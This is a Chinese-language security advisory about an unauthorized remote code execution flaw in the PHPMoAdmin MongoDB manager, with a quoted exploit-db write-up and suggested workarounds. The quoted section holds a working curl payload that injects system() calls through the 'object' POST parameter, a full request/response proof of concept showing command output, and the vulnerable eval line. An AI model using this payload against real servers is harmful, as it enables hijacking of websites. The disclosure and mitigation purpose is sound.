当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

PHPMoAdmin未授权远程代码执行漏洞

     发表日期:2015-03-17 09:41:57

PHPMoAdmin未授权远程代码执行漏洞
发布日期:2015-03-04
更新日期:2015-03-05
受影响系统:
PHPMoAdmin PHPMoAdmin
详细信息:
MongoDB是开源的NoSQL数据库。phpMoAdmin是一个免费、开源、以PHP为基础、基于AJAX的MongoDBGUI管理工具,管理者可轻松管理NoSQL数据库。

phpMoAdmin在实现上存在远程代码执行漏洞,未授权远程用户可利用此漏洞劫持使用phpMoAdmin工具的网站。


来源:
sp1nlock
参考信息:
http://www.exploit-db.com/exploits/36251/
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!######################################################################
# _ ___ _ _ ____ ____ _ _____
# | | / _ \\| \\ | |/ ___|/ ___| / \\|_ _|
# | | | | | | \\| | | _| | / _ \\ | |
# | |__| |_| | |\\ | |_| | |___ / ___ \\| |
# |_____\\___/|_| \\_|\\____|\\____/_/ \\_\\_|
#
# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
# Website : http://www.phpmoadmin.com/
# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
# Release dates : March 3, 2015
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################

[+] Description
============================================================
PHPMoAdmin is a MongoDB administration tool for PHP built on a
stripped-down version of the Vork high-performance framework.

[+] Exploit
============================================================
Someone was trying to sale this shit for 3000usd lolz

$ curl "http://path.to/moadmin.php" -d "object=1;system(\'id\');exit"

[+] Proof-of-Concept
============================================================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7

POST /moadmin/moadmin.php HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

object=1;system(\'id;ls -lha\');exit

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 16:57:40 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 223
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 116K
drwxr-xr-x 1 longcat longcat 102 Mar 3 16:55 .
drwxr-xr-x 6 root root 4.0K Mar 3 16:17 ..
-rw-rw-r-- 1 longcat longcat 112K Mar 3 16:55 moadmin.php

[+] Vulnerability Analysis
============================================================
Filename: moadmin.php
1. create new moadminComponent object
1977: $mo = new moadminComponent;

2. if the http-post parameter \'object\' is set
738: class moadminComponent {
...
762: public function __construct() {
...
786: if (isset($_POST[\'object\'])) {
787: if (self::$model->saveObject($_GET[\'collection\'],
$_POST[\'object\'])) {
...

3. evaluate the value of \'object\' as PHP code
692: public function saveObject($collection, $obj) {
693: eval(\'$obj=\' . $obj . \';\'); //cast from string to array
解决办法:
临时解决方法:

建议您采取以下措施以降低威胁:

* 在开发者发布修复补丁之前,MongoDB用户暂时不要使用phpMoAdmin工具。

* 或者暂时使用其他免费MongoDB GUI工具,例如:
RockMongo
MongoVUE
Mongo-Express
UMongo
Genghis

* 或者使用分布式配置密码(htaccess password)限制未经授权的访问moadmin.php文件。

厂商补丁:

PHPMoAdmin
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.phpmoadmin.com/